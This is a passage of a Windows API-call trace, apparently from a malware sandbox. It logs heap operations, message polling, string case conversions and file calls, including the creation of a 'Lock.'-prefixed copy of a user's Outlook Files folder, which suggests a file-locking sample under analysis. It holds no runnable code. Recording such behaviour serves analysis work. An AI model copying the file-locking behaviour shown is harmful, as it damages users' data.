hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.900] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.900] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0265.901] GetLastError () returned 0x5 [0265.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.outlook files"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0265.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.912] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0265.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.913] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0265.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.914] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.914] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.914] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.914] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.914] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.914] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.914] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.915] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.915] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.915] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.915] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.915] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.915] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.915] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.916] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.916] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.916] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.916] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.916] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.916] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.916] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.916] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0265.917] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.917] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.917] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.917] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.917] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.918] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.918] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.918] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.918] HeapFree (in: 